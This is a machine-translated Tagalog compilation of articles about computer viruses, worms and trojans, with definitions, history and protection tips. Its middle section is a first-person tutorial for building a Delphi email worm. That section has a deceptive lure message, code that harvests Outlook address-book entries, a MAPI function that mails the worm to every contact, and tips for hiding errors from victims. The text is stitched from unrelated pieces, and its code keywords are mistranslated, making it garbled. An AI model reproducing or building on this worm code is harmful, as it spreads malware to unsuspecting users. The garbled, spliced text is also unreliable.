Ano ang mga virus sa computer, Trojan at worm, at ano ang pagkakaiba ng mga ito? Ano ang pagkakaiba ng worm, trojans at virus

Ang pangunahing paraan ng pagkakaiba ng mga uod sa isa't isa ay ang paraan ng pagkalat ng uod. Ang iba pang mga palatandaan ng pagkakaiba ay ang mga paraan ng paglulunsad ng isang kopya ng worm sa nahawaang computer, mga paraan ng pagpapakilala sa system, pati na rin ang polymorphism, stealth at iba pang mga katangian na likas sa iba pang mga uri ng malisyosong software (mga virus at Trojans).

Mga uri ng bulate

Depende sa paraan ng pagtagos nila sa operating system, nahahati ang mga worm sa:

  • Mail worm(Mail-Worm) - mga uod na kumakalat sa format ng mga mensaheng email. Sa kasong ito, ang worm ay nagpapadala ng alinman sa isang kopya ng sarili nito bilang isang attachment sa isang email, o isang link sa file nito na matatagpuan sa ilang mapagkukunan ng network (halimbawa, isang URL sa isang nahawaang file na matatagpuan sa isang na-hack o hacker na website). Sa unang kaso, ang worm code ay isinaaktibo kapag ang isang nahawaang attachment ay binuksan (inilunsad), sa pangalawa - kapag ang isang link sa isang nahawaang file ay binuksan. Sa parehong mga kaso, ang epekto ay pareho - ang worm code ay isinaaktibo.
  • IM worm(IM-Worm) - mga worm na gumagamit ng mga mensahero sa Internet. Ang mga kilalang computer worm ng ganitong uri ay gumagamit ng tanging paraan ng pagpapalaganap - pagpapadala ng mga mensahe sa mga nakitang contact (mula sa listahan ng contact) na naglalaman ng URL sa isang file na matatagpuan sa ilang web server. Ang diskarteng ito ay halos ganap na kinokopya ang isang katulad na paraan ng pag-mail na ginagamit ng mga mail worm.
  • P2P worm(P2P-Worm) - mga worm na kumakalat gamit ang mga network ng pagbabahagi ng file ng peer-to-peer. Ang mekanismo ng pagpapatakbo ng karamihan sa mga worm na ito ay medyo simple - upang makalusot sa isang P2P network, kailangan lamang ng worm na kopyahin ang sarili nito sa isang direktoryo ng pagbabahagi ng file, na karaniwang matatagpuan sa lokal na makina. Ang P2P network ang nangangalaga sa lahat ng iba pang gawain sa pagpapalaganap ng virus - kapag naghahanap ng mga file sa network, ipapaalam nito sa mga malalayong user ang tungkol sa file na ito at ibibigay ang lahat ng kinakailangang serbisyo para sa pag-download ng file mula sa nahawaang computer. Mayroong mas kumplikadong mga P2P worm na ginagaya ang network protocol ng isang partikular na file-sharing system at positibong tumutugon sa mga kahilingan sa paghahanap - habang ang worm ay nag-aalok ng kopya ng sarili nito para sa pag-download.
  • Mga bulate sa mga channel ng IRC(IRC-Worm). Ang ganitong uri ng worm, tulad ng mga email worm, ay may dalawang paraan ng pagkalat ng worm sa pamamagitan ng mga channel ng IRC, na inuulit ang mga pamamaraan na inilarawan sa itaas. Ang una ay nagsasangkot ng pagpapadala ng URL sa isang kopya ng worm. Ang pangalawang paraan ay ang magpadala ng isang nahawaang file sa ilang gumagamit ng network. Sa kasong ito, dapat kumpirmahin ng inaatakeng user ang pagtanggap ng file, pagkatapos ay i-save ito sa disk at buksan ito (patakbuhin ito para sa pagpapatupad).
  • Mga uod sa network(Net-Worm) - iba pang mga network worm, kung saan ito ay makatuwiran upang dagdagan ang pagkilala sa mga Internet worm at LAN worm
    • Mga bulate sa internet- mga uod na gumagamit ng mga protocol sa Internet para kumalat. Kadalasan, ang ganitong uri ng worm ay kumakalat gamit ang maling pagpoproseso ng mga pangunahing packet ng TCP/IP protocol stack ng ilang mga application.
    • Mga LAN worm- mga bulate na kumakalat sa pamamagitan ng mga lokal na protocol ng network

Karaniwan, tinutukoy ng lahat ng tao ang anumang uri ng malisyosong software bilang "Computer Virus", ngunit sa katunayan hindi ito eksaktong totoo. Maraming uri ng malware, kabilang ang mga virus, Trojan at worm, at bawat uri ay may sariling pag-uugali at iba-iba ang pagkalat.

Sa halip na ang pangalang “computer viruses,” mas tamang gamitin ang “malware,” dahil Ang isang computer virus ay isa lamang uri ng malware, tulad ng isang Trojan o isang worm. Kaya kung gusto mo ng pangkalahatang termino para sa hindi kanais-nais at masamang mga programa, pagkatapos ay gamitin ang salitang malware. Ngunit walang pakialam ang mga antivirus program kung ano ang pangalan o uri ng malware - maaari nilang alisin ang mga Trojan, virus, worm at iba pang uri ng malware. Ngunit sa artikulong ito ay hindi namin pag-uusapan ang tungkol sa mga antivirus program; sasabihin namin sa iyo ang tungkol sa mga pangunahing uri ng malware, ibig sabihin, kung ano ang isang virus, Trojan at worm, at kung ano ang pagkakaiba sa pagitan ng mga ito.

Ang isang computer virus ay nakakahawa sa iba pang mga file at program, katulad ng isang biological virus na nakahahawa sa mga buhay na selula. Sa karamihan ng mga kaso, ang mga virus ay nakakahawa sa mga file na may extension na .exe, kaya sa kanilang sarili, na nasa memorya lamang ng hard drive, ang mga virus ay hindi makakahawa sa iba pang mga file, ngunit kapag ang .exe file na may virus ay inilunsad lamang. Sa madaling salita, kung magbubukas ka ng .exe file na naglalaman ng virus, saka lang magsisimulang kumalat ang virus.

Ang ilang mga uri ng mga virus sa computer ay maaari ring makahawa sa iba pang mga uri ng mga file, tulad ng mga macro sa Word o Excel na mga dokumento. Maaaring kumalat ang mga naturang virus sa pamamagitan ng mga email attachment, naaalis na storage device, o mga network folder.

Ang mga virus sa computer ay maaaring magpahamak sa iyong system. Sa ilang mga kaso, maaari nilang palitan nang buo ang mga kasalukuyang file ng program sa kanilang mga sarili, sa halip na gaya ng dati bilang karagdagang file sa mga kasalukuyang file. Nangangahulugan ito na tinatanggal ng virus ang lahat ng mga file, sa gayon ay ipinapahayag ang presensya nito. Maaari ring sakupin ng mga virus ang memorya ng system, na nagiging sanhi ng mga pag-crash ng system.

Ang mga virus ay lubhang mapanganib dahil... napakabilis nilang kumalat.

Ano ang mga computer worm?

Ang uod (sa Ingles: Worms) ay isang independiyenteng programa na kumakalat nang walang interbensyon ng gumagamit. Kung ang mga virus ay kumalat sa tulong ng mga gumagamit mismo, pagkatapos ay ginagawa ito ng mga worm nang nakapag-iisa. Ngunit hindi nila nahawaan ang iba pang mga file sa halip, sila ay gumagawa at namamahagi ng mga kopya ng kanilang mga sarili.

Ang ilang mga worm, tulad ng kasumpa-sumpa na Mydoom worm, na nahawahan ng higit sa kalahating milyong mga computer sa buong mundo, ay nagkalat ng mga kopya ng kanilang mga sarili sa pamamagitan ng email. At ang iba pang parehong mapanganib at mabilis na pagkalat ng mga worm, tulad ng Blaster at Sasser, ay gumagamit ng mga kahinaan sa network sa halip na gumamit ng mga email. Naglalakbay sila sa buong network at nahawahan ang mga luma at mahinang sistema na walang firewall.

Ang mga worm na kumakalat sa isang network ay maaaring makabuo ng malaking dami ng trapiko, na nagpapabagal sa network. At pagkatapos nitong makapasok sa system, maaari itong magsagawa ng parehong mga aksyon tulad ng isang nakakahamak na virus.

Ano ang isang Trojan?

Ang mga Trojan ay pinangalanan pagkatapos ng mythological Trojan horse. Upang masakop ang Troy, ang mga Griyego ay nagtayo ng isang malaking kahoy na kabayo at ibinigay ito sa mga Trojan bilang regalo. Tinanggap ng mga Trojan ang regalo sa kanilang lungsod. Nang maglaon nang gabing iyon, lumabas ang mga sundalong Greek mula sa isang kahoy na kabayo at binuksan ang mga pintuan ng lungsod - at kung ano ang sumunod, maaari mong isipin.

Ang isang Trojan horse ay halos parehong bagay sa isang computer. Ang Trojan horse ay nagpapakilala sa sarili bilang mga kapaki-pakinabang na programa, i.e. nagpapakita ng sarili bilang isang normal at kapaki-pakinabang na programa, halimbawa, mga programa tulad ng Russifiers, key generators, atbp. Kapag nasa iyong system, magbubukas ang Trojan ng backdoor sa iyong system i.e. butas (vulnerability).

Pagkatapos, gagamitin ng may-akda ng Trojan na ito ang butas na ito para sa kanyang sariling mga layunin. Halimbawa, maaari nitong gamitin ang iyong koneksyon sa Internet para sa mga ilegal na aktibidad na sa huli ay ituturo lamang sa iyo. O upang mag-download ng iba pang mga nakakahamak na programa, sa pangkalahatan, sa pamamagitan ng pinto sa likod na ito ang may-akda ng Trojan ay maaaring gumawa ng anuman.

Iba pang pagbabanta

Mayroong iba pang mga uri ng malware, narito ang ilan sa mga ito:

  • Spyware- Ito ay mga malisyosong program na susubaybayan ang iyong mga aksyon sa computer. Halimbawa, maaaring matandaan ng "Mga Keylogger" (mga keylogger) ang mga key o kumbinasyon ng key na iyong pinindot at ipadala ang mga ito sa kanilang lumikha. Maaari nilang nakawin ang impormasyon ng iyong credit card, password sa online banking, atbp. Ang Spyware ay idinisenyo upang kumita ng pera para sa lumikha nito.

  • Panakot- kilala rin bilang scam software. Kadalasang lumalabas ang mga ito bilang isang pekeng antivirus alert sa isang web page. Kung naniniwala ka sa alerto at nag-download ng isang pekeng antivirus program, pagkatapos i-download ang program ay ipaalam sa iyo na may mga virus sa iyong system at humingi ng numero ng credit card o igiit ang pagbabayad upang maalis ng program ang mga virus. Iho-hostage ng program ang iyong system hanggang sa mabayaran mo o i-uninstall ang program.

Palaging panatilihing na-update ang iyong operating system at iba pang mga program sa iyong computer, at laging may antivirus program upang protektahan ang iyong sarili mula sa mga ganitong uri ng pagbabanta.

Mayroon ka pa bang mga tanong sa paksa ng mga virus sa computer, Trojan at iba pang uri ng malware? Mag-iwan ng komento at sasagutin namin ang anumang mga katanungan na maaaring mayroon ka.

Ngayon ay ilalarawan ko sa iyo ang prinsipyo ng pagpapatakbo ng isang virus ng network. Ang paksa, tulad ng naiintindihan mo, ay napaka-kaugnay, dahil 70% ng aking personal na mailbox ay palaging puno ng mga virus ng lahat ng uri
- mula sa maliliit ngunit masasamang VBS worm hanggang sa isa at kalahating megagram na gawa ng mga junior schoolchildren :) Hindi nila alam ang tungkol sa pagkakaroon ng WinAPI :)

Upang makapasok sa isang computer, maaaring gumamit ang mga virus ng mga bug sa software ng user (VBS+Outlook=love:)) o mga bug sa ulo ng user. Tingnan natin ang isang halimbawa ng naturang viral letter:

Subj: Nakakatawa
Hello! Keep the cool joke that I promised to you (or not to you, I don't remember :)). Ngunit panatilihin ito pa rin. Huwag mag-alala, wala talaga itong na-format!
Huwag kalimutang suriin, paranoid :)
Good luck!
Attach: fake_format.exe

Buweno, narito ito: ang bawat pilay na gumagamit ng Internet ay patuloy na nagpapadala ng mga biro sa kanyang mga kaibigan, at, nang naaayon, hindi talaga naaalala kung sino ang kanyang ipinangako kung ano ang gagawin; ang mensahe tungkol sa "pekeng pag-format" ay inililipat ang utak ng biktima sa mga biro, at bulag na pananampalataya sa mga antivirus
- matatapos 🙂 Hayaan mong ipaalala ko sa iyo na ang mga algorithm na inilarawan ko ay hindi tinutukoy ng anumang webs, avp at iba pang mga manlalaban.

Sa madaling salita, gusto ko nang simulan ang nakakatawang biro na ito sa aking sarili. Ilulunsad ko ito :)

Error... hindi nahanap ang intel pentium 5!

Oh... Parang hindi gumagana? Hindi, hindi ko hulaan 🙂 Sa katunayan, agad na inilipat ng virus ang katawan nito sa hard drive ng biktima, nag-sign up para sa startup, at tatambay na ngayon sa RAM (hint: sa medikal na jargon, "RAM" ay OPERATIVE SURGERY, kaya mag-ingat;)) mga biktima ayon sa prinsipyong inilarawan ko sa artikulong "Do-It-Yourself Resident Virus." Tanging hindi nito susuriin ang paglulunsad ng mga file, ngunit ang koneksyon sa Internet 🙂 (sa source code ito ang magiging pamamaraan ng IsOnline, kaya para sa hinaharap;)). Gayunpaman, sa parehong oras
walang pumipigil sa iyo sa pagsubaybay sa paglulunsad ng mga file
- isa pa rin itong virus, kahit na ito ay virus ng network. Samakatuwid, isasama ko ang pamamaraan ng InfectFile sa lohika. Kaya gagamitin namin ang mga sumusunod na function at procedure:

ISONLINE - sinusuri ang koneksyon sa Internet
SENDVIRUS - hulaan ng tatlong beses 😉
GETMAILS - kumuha ng mga address mula sa Outglitch's AddressesBook
INFECTFILES - 🙂
WORKMEMORY - halos kapareho ng sa nakaraang artikulo, ngunit may mga pagbabago.

CODING

Bago magsimula ang aktwal na coding, sa pagkakataong ito maraming paunang haplos ang kakailanganin :) Ipapaliwanag ko kung bakit: upang basahin ang address book, maa-access namin ang Outlook sa pamamagitan ng interface ng interprogram, at para dito hindi masama para sa amin na gamitin ito uri ng aklatan. Kaya gawin: project import type library, at tumingin doon... tama, Outlook express v.9 o anumang mayroon ka. Ang ikasiyam na bersyon ay itinuturing na, kung hindi ako nagkakamali, mula sa Office2k. Imported? Ano ang ibig sabihin ng "wala sa listahan"? Okay, nangyayari ito. Manu-manong maghanap
— sa direktoryo na may opisina ay may file na msoutl.olb. Ito na 😉 Sumulat na ngayon ng outlook_tlb sa seksyon ng mga gamit at magkakaroon ka ng access sa mga pinakakilalang lugar sa iyong address book 🙂 Oh, medyo abala ako ngayon 😉
Sa pangkalahatan, ang pamamaraan para sa pag-gutting ng address book ay dapat magmukhang:

gamit
ComObj, outlook_tlb,
Mga form;
….
Pamamaraan GET MALS;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s:string;
num, i: Integer;
mail: hanay ng mga string;

magsimula
MSOutlook:= CreateOleObject('Outlook.Application');
MyNameSpace:= MSOutlook.GetNameSpace('MAPI');
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength(mails,MyFilder.Items.Count);
para sa i:= 1 sa MyFolder.Items.Count do
magsimula
MyItem:= MyFolder.Items[i];
mail[i]:= myitem.email1adres;
wakas;

Well, natuwa ka ba sa sinulat ko? Gee, lalala lang. Dahil ang virus ay ipapadala gamit ang isang purong API. At ito, gaya ng sabi ng Horrific: “katulad ng manual sex. Mayroong epekto sa parehong mga kaso, ngunit ito ay tumatagal ng mahabang panahon upang makamit ito at walang ganoong buzz” :) Well
so anong sinulat ko dito? Nagbibigay-daan sa amin ang Uses Comobj na magtrabaho kasama ang teknolohiya ng COM; Pagkatapos ay gagawa lang kami ng OLE Outlook object at paikot na alamin ang listahan ng mga email mula rito. Kung may gusto kang malaman pa
- ito ay totoo rin, basahin ang mga dokumento - sila ang naghahari. Kahit sa English. Ang listahan ng mga email ay nakasulat sa isang dynamic na hanay ng mga string. Ito ay gagamitin ng SendVirus function. Ang isang ito:

function na SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i:integer;
s:string;
magsimula
sa MapiRecipDesc ​​ay magsisimula
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDSize:= 0;
lpEntryID:= nil;
wakas;

sa MapiFileDesc ay magsisimula
ulReserved:= 0;
flFlags:= 0;
nPosisyon:= 0;
lpszPathName:= PChar(Attachment);
lpszFileName:= nil;
lpFileType:= nil;
wakas;

sa MapiMessage magsisimula
ulReserved:= 0;
lpszSubject:= nil;
lpszNoteText:= PChar(Subject);
lpszMessageType:= nil;
lpszDateReceived:= nil;
lpszConversationID:= nil;
flFlags:= 0;
lpOriginator:= nil;
nRecipCount:= 1;
lpRecips: = @MapiRecipDesc;
kung haba(Attachment) > 0 pagkatapos ay magsimula
nFileCount:= 1;
lpFiles: = @MapiFileDesc;
tapusin iba magsimula
nFileCount:= 0;
lpFiles:= nil;
wakas;
wakas;

Resulta:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
o MAPI_LOGON_UI o MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
wakas;

Namamaga ka ba habang binabasa ito? Pumunta at uminom ng serbesa, kung hindi, wala kang maiintindihan.
uminom ka ba Ako din 😉 Sige ituloy na natin. Gagamitin mo ito tulad nito:

Para sa i:= 1 sa haba (mails) gawin
magsimula
SendVirus(",mails[i],'pricol','..');
wakas;

Gagamitin namin ang mga gamit ng MAPI dito, kaya huwag kalimutang ideklara ito. Sa madaling salita, ito
— mababang antas ng trabaho sa mail. At para magtrabaho sa mail, tulad ng alam mo, kailangan mong magkaroon ng)
email ng tatanggap b) text ng sulat c) attachment. Ito ang ginagawa ko:
MapiRecipDesc ​​​​- ilarawan ang tatanggap, MapiFileDesc - attachment,
mga. ang aming virus, ang MapiMessage, ay isang mensahe, pagkatapos ay ipapadala ko ito sa malaking buhay gamit ang utos ng MapiSendMail 😉 Well, ito ay naging hindi napakahirap. Ang pangunahing bagay ay upang maunawaan na ang iyong pinakadakilang kaibigan
- hindi ito c:\porno, ngunit win32.hlp :)

Paano natin ngayon maiangkop ang lahat ng salitang ito sa malupit na lohika ng virus? Malalaman mo ito para sa iyong sarili, sinasabi ko sa iyo ang tungkol dito para sa 2 magkasunod na artikulo. And anyway, I celebrated my girlfriend’s birthday yesterday, and now medyo sumasakit ang ulo ko :) Well, okay, the sense of duty is stronger. Gawin mo lang:
Ang unang linya ay upang suriin ang pangalan ng file kung saan ka nagsimula. Kung
Ang ibig sabihin ng pricol.exe ay CopyFile sa Windows :) At kung nagsimula ka sa direktoryo ng Windows
- pagkatapos ay cyclically suriin ang iyong koneksyon sa buong mundo 😉 network. Sinusuri namin:

function na IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
magsimula
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Resulta:= (Res = 0) at (dwCount > 0);
wakas;

Kaya. Kung okay na ang lahat, sige - iling ang iyong address book at ipadala ang mail. Mayroong dalawang trick dito. Kung pangalan mo
pricol.exe - agad na suriin ang koneksyon. Maaaring tumitingin ang user ng email online. Ito ay lubos na magpapalaki sa ating mga pagkakataong makakuha ng isang newsletter. Naisip mo na mismo ang pangalawang lansihin,
ibig sabihin, sa scenario na inilarawan ko, palagi kang magpapadala ng magkaparehong mga titik sa parehong user, dahil lang hindi siya nabura sa address book. Samakatuwid, isulat ang lahat ng naprosesong address sa isang log file at patuloy na suriin ito. Ganun daw. Bagama't hindi. Huwag kalimutang ilakip ang mga fragment ng code na madaling kapitan ng error sa pagsubok..maliban. At ilagay ang susi ($D-). Dahil kung ang user ay biglang nahuli ng isang error tulad ng "'FUCK' ay hindi wastong halaga ng integer," maghihinala siya ng isang bagay.

KONGKLUSYON

Ang huling artikulong ito ay tungkol sa mga virus na na-debug para sa Windows 9x. Na-format ko kamakailan ang turnilyo at nag-install ng WindowsXP Professional, kaya ang mga sumusunod na halimbawa ay para dito. At maaari mo nang dahan-dahang bilhin ang Delphi 7, dahil naihasik ko ang aking ikaanim sa isang lugar, at ngayon ay nakaupo na akong ganap na hubad :) Bibili ako ng ikapito, nang naaayon 😉

Ang susunod na artikulo ay malamang na nakatuon sa steganography at ang praktikal na pagpapatupad nito.

Mga uod sa network(isa pang pangalan ay computer worm) ay mga program na nilikha na may panloob na mekanismo para sa pagkalat sa mga lokal at pandaigdigang network ng computer para sa ilang partikular na layunin. Ang mga layuning ito ay:

  • pagtagos sa mga malalayong computer na may bahagyang o kumpletong pagharang ng kontrol sa kanila (nakatago mula sa gumagamit - ang may-ari ng computer na ito, siyempre);
  • paglulunsad ng iyong kopya sa iyong computer;
  • karagdagang pamamahagi sa lahat ng magagamit na mga network, parehong lokal at pandaigdigan.

Ilista natin ang ilang uri ng mga network kung saan ipinapadala ang mga network worm. Ito ay, una sa lahat, siyempre, email, iba't ibang mga instant messenger sa Internet, pagbabahagi ng file at torrent network, mga lokal na network, mga exchange network sa pagitan ng mga mobile device.

Ang mga computer worm ay pangunahing ipinamamahagi sa anyo ng mga file. Ang mga ito ay naka-attach bilang mga attachment sa mga email at mensahe, o sa iba't ibang paraan ang gumagamit ay iniimbitahan na sundin ang isang tiyak na link, i-download at patakbuhin sa kanyang lokal na computer ang ilang lubhang kailangan at libreng programa, litrato, atbp. (mayroong walang katapusan na maraming mga pagpipilian para sa pagtatakip ng mga virus sa network). Dapat sabihin na ang e-mail ay naging isang halos perpektong lugar ng pag-aanak para sa pagkalat ng mga network worm. At ang bilis kung saan sila (mga network worm) kumalat sa buong Internet ay kadalasang kamangha-mangha.

Ngunit mayroon ding mga tinatawag na "fileless, packet" na mga virus ng network na kumakalat sa anyo ng mga network packet at tumagos sa computer gamit ang iba't ibang mga butas at kahinaan sa operating system o naka-install na software.

Upang makapasok sa isang malayuang computer, iba't ibang mga pamamaraan ang ginagamit, mula sa mga pamamaraan ng social engineering (kapag nakatanggap ka ng ilang uri ng nakatutukso na sulat na may link o nakalakip na file, na humihimok sa iyong buksan ang nakalakip na file na ito o sundin ang tinukoy na link), o, tulad ng nakasulat sa itaas, ang pagtagos na ito sa pamamagitan ng mga kahinaan at back-door sa software na ginamit. Posible rin ang pagtagos dahil sa mga kasalukuyang pagkukulang sa pagpaplano at pagpapanatili ng lokal na network (isang halimbawa ay anumang ganap na ibinahagi at hindi protektadong lokal na disk).

Bilang karagdagan sa mga pangunahing pag-andar nito network worm Madalas ay naglalaman din sila ng mga function ng iba pang malisyosong software - mga virus, Trojans, atbp.

Tulad ng ipinapakita ng mga istatistika mula sa mga anti-virus laboratories, higit sa 80% ng lahat ng mga problemang nauugnay sa pagtagos ng malisyosong software (mga network worm, Trojans at mga virus) sa mga lokal na computer ng mga user ay nauugnay sa pangunahing kamangmangan at kakulangan ng kinakailangang mga kasanayan sa Internet sa mga ito. parehong mga gumagamit.

Magsagawa tayo ng maikling iskursiyon sa kasaysayan at alamin kung saan at paano nagmula ang mga ito, ang mga nakakahamak na programang ito - mga computer worm.

Ang mga unang eksperimento, kung saan ginamit ang mga unang prototype ng computer worm, ay isinagawa noong 1978 sa Xerox Research Center sa Palo Alto. Ang mga nagpasimula ng gawaing ito ay sina John Schoch at Jon Hupp. Ang terminong "network worm" mismo ay lumitaw sa ilalim ng impluwensya ng science fiction literature (sa partikular, ang mga nobela ni D. Gerrold "When Harley Was One Year Old" at D. Brunner "On Shock Wave").

Marahil ang pinakatanyag na network worm ay ang tinatawag na "Morris Worm," na isinulat noong 1988 ng estudyante ng Cornell University na si R. Morris Jr. Ang virus ay tumama sa network noong Nobyembre 2, 1988, at mabilis na kumalat sa isang malaking bilang ng mga computer na konektado sa Internet.

Mayroong iba't ibang uri ng network worm. Una sa lahat, dapat nating banggitin ang mga worm na residente ng RAM, na matatagpuan sa RAM ng computer nang hindi naaapektuhan ang mga file sa hard drive. Ang pag-alis ng naturang mga worm sa computer ay medyo simple - i-restart lamang ang operating system, i-reset nito ang data sa RAM, at naaayon ang worm ay mabubura. Ang mga virus na residente ng RAM ay binubuo ng dalawang bahagi: ang pagsasamantala (o shellcode) kung saan sila tumagos sa computer, at ang katawan ng worm mismo.

Mayroon ding mga virus na, sa matagumpay na pagtagos sa isang computer, nagsasagawa ng ilang mga aksyon sa mga lokal na disk: nagsusulat sila ng ilang program code doon (isang halimbawa ay ang pagbabago ng mga susi sa Windows registry o pagrehistro ng virus file sa Startup). Gayundin uod Kung matagumpay itong nakapasok sa isang computer, maaari itong independiyenteng mag-download ng anumang karagdagang mga file sa network (mga virus, Trojans, iba pang network worm) at gawing lugar ng pag-aanak ang iyong computer para sa anumang impeksyon sa computer.

Medyo mahirap tuklasin at, nang naaayon, i-neutralize ang mga network worm na ito. Ang mga programang antivirus na may na-update na mga database ng lagda ng virus ay makakatulong sa iyo dito.

Ang mga ito ay isang tiyak, espesyal na uri ng virus. Ang kapaligiran para sa regular na malware ay ang file system, habang ang mga worm ay umaabot sa aming mga device sa pamamagitan ng network. Bilang karagdagan, maaari silang makapasok sa isang PC hindi lamang sa pamamagitan ng e-mail o sa Internet, sila ay napapailalim din sa iba Samakatuwid, ang paksa ng artikulong ito ay mga worm sa network at proteksyon laban sa kanila. Pagkatapos ng lahat, tumagos sila sa mga network ng mga operator ng mobile network, at mga lokal na LAN network, at mga IRC network para sa mga chat, at mga P2P network na idinisenyo para sa direktang pagpapalitan ng file sa pagitan ng mga user nang direkta, at mga network ng mga serbisyong ginagamit para sa instant messaging.

Isang maliit na kasaysayan ng mga network worm

Ang unang impormasyon tungkol sa kanilang aksyon ay lumitaw noong 1978. Sina Jon Hupp at John Schoch, mga programmer sa Xerox, ay nagtaka tungkol sa pagkolekta at pagproseso ng impormasyon mula sa lahat ng mga computer patungo sa isa, sa gitna. Pagkaraan ng ilang oras, ang bawat PC ng kumpanya, na naproseso ang kinakailangang dami ng trabaho, ipinadala ang resulta sa programa na isinulat ng aming mga programmer, at ito, sa lahat ng oras na nasa lokal na network, ay nagproseso ng data at ipinadala ito sa gitnang kompyuter. Napakabilis na nawalan ng kontrol ang mga kaibigan sa kanilang programa at sa mahabang panahon ay hindi maintindihan kung ano ang nangyayari.

Lumitaw ang hindi nakokontrol na trapiko, pagkatapos ay na-block ang buong network. Sa pag-imbestiga sa problema, natuklasan ng mga programmer ang isang uri ng virus, na tinatawag na mga virus ng network. Dapat ding tandaan ng mas lumang mga gumagamit ng computer ang w32.Blaster.worm, isang worm na nag-impeksyon sa Windows mula 2000 hanggang XP at pumigil sa pag-access sa Internet sa pamamagitan ng pag-reboot ng computer. Noong Nobyembre 1988, ang "Morris Worm" ay naging tanyag, na nahawahan ang 10% ng lahat ng mga computer sa mundo dahil sa isang maliit na error ng may-akda ng code. Ang mga PC na ito ay nanatiling idle nang ilang linggo, na nagdulot ng humigit-kumulang $100 milyon na pinsala. Samakatuwid, ang paksang tulad ng mga network worm at proteksyon laban sa mga ito ay napakahalaga at ang kahalagahan nito ay tumataas lamang sa paglipas ng panahon.

Mga uri ng network worm at ang kanilang mga landas sa isang computer

Ano ang mga gawain ng malware na ito? Ang mga pangalawa ay ang tumagos sa iyong device, mag-activate dito at magsimulang dumami, ngunit hindi lamang sa iyong PC. Kaya ang pangunahing gawain - upang makapasok sa mga device ng ibang tao sa pamamagitan ng network. Ano sila, ang kanilang mga uri? Ang pangunahing bahagi ng partikular na virus na ito ay ang mga email worm na pumapasok sa computer na may naka-attach na file sa isang email. Ang user mismo ang nag-activate nito, sinusubukang buksan ito. Ito ay totoo lalo na para sa mga walang karanasan na computer scientist na hindi nakapansin ng anumang kahina-hinala sa extension ng file na inilulunsad, dahil kadalasan ay mali lamang ang nakikita.

Samakatuwid, dapat mong palaging sundin ang lumang rekomendasyon - hindi tumugon sa mga liham mula sa mga hindi kilalang tao. Kapag na-activate na, ang mga virus ng network ay nakakahanap ng mga email address sa device at nagpapadala sa kanila ng kopya ng kanilang mahal sa buhay. Sa katulad na paraan, "kumakalat" ang mga worm sa pamamagitan ng mga kliyente ng IRC, ICQ, at iba pang katulad na mga mensahero. Minsan pumapasok sila sa mga PC dahil sa mga kapintasan sa operating system, software at mga browser. Mayroong iba pang mga uri ng network worm: IRC worm, P2P worm at IM worm. Sa tingin namin ay malinaw na sa mga pangalan kung ano ang ginagawa nila at kung paano sila nakapasok sa PC.

Iba pang mga gawain ng mga network worm at ang kanilang mga palatandaan sa isang computer

Ang kanilang prinsipyo ng pagpapatakbo ay katulad ng sa ilang iba pang malware, halimbawa, Matapos makumpleto ang kanilang pangunahing gawain, magsisimula silang magsagawa ng iba pang mga gawain. Kabilang sa mga ito: pag-install ng mga programa upang kontrolin (malayuan) ang isang nahawaang computer, pagnanakaw ng data, pagsira nito, iyon ay, lahat ng bagay na na-program sa kanila ng lumikha.

Ngunit kahit na wala ang mga karagdagang pagkilos na ito, tumataas ang dami ng trapiko sa device, bumababa ang performance, at nilo-load ang mga channel ng komunikasyon. Ito ay isang malinaw na tanda ng isang uod sa system. Kung ang antivirus ay naharang, kung gayon ito ay isa pang katotohanan na kailangan mong bigyang pansin. Maaaring ma-block ang pag-access sa mga site ng software ng antivirus.

Paano protektahan ang iyong sarili mula sa mga worm sa network?

Tiningnan namin nang mabuti ang unang bahagi ng expression - mga network worm at proteksyon laban sa kanila, ngayon ay lumipat tayo sa pangalawa. Nais naming agad na bigyan ng babala na ang isang regular na antivirus na may pangunahing pag-andar ay hindi makakatulong sa iyo sa pinakamainam, matutuklasan nito ang katotohanan ng banta at harangan ito; Ngunit hindi nito pipigilan ang isa pang kumpanya ng malware na muling ma-access ang iyong network. Ngunit kung ang iyong PC ay konektado sa isang network, ang isang mahusay na antivirus ay isang kinakailangan para sa operasyon nito.

Ang proteksyon laban sa mga network worm ay kasama rin sa pag-andar ng operating system mismo. Mayroon itong mga tool upang gawin ito, na, sa pinakamababa, makabuluhang bawasan ang panganib ng impeksyon. Ang mga pangunahing ay mga awtomatikong pag-update ng OS at isang naka-activate na firewall/firewall. Sa mga pirated build madalas itong hindi pinagana, na maaaring humantong sa mga seryosong problema. Pagkatapos ng lahat, ito ay ang firewall na sumusuri sa lahat ng data na pumapasok sa network computer at nagpapasya kung papayagan ito o hindi.

Proteksyon ng third-party laban sa mga network worm

Upang mapahusay ang proteksyon ng iyong computer laban sa mga network worm, hacking worm, at iba pang mga virus, inirerekomenda na mag-install ka ng third-party na firewall bilang alternatibong solusyon. Ang ganitong mga programa, dahil sa kanilang mas makitid na pokus, ay may mas nababaluktot na mga setting. Ang sikat sa mga user ay ang: Comodo Firewall - ganap na libreng software at Outpost Firewall Pro - binayaran.

Upang patuloy na maging napapanahon sa lahat ng mga bagong produkto sa paglaban sa bagong "impeksyon", ipinapayo namin sa iyo na bumaling sa mapagkukunan ng viruslist ru. Mayroong lahat ng uri ng network worm doon, ang paglitaw ng mga bago ay sinusubaybayan, at malalaman mo kaagad ang tungkol dito. Sa pamamagitan ng paraan, bilang karagdagan sa mga kilalang antivirus, hinaharangan din ng mga worm ang pag-access sa mapagkukunan ng VirusInfo, na mayroong serbisyo para sa libreng paggamot ng mga aparato laban sa iba't ibang mga impeksyon.

Mga konklusyon

Ibigay natin sa madaling sabi ang buong cycle ng buhay ng pagbuo ng mga network worm sa ilang mga pangungusap:

  1. Pagpasok sa iyong system.
  2. Ang isang mahalagang punto ay ang pag-activate.
  3. Maghanap ng mga potensyal na biktima.
  4. Paggawa at paghahanda ng mga kopya.

Karagdagang pamamahagi ng mga kopya.

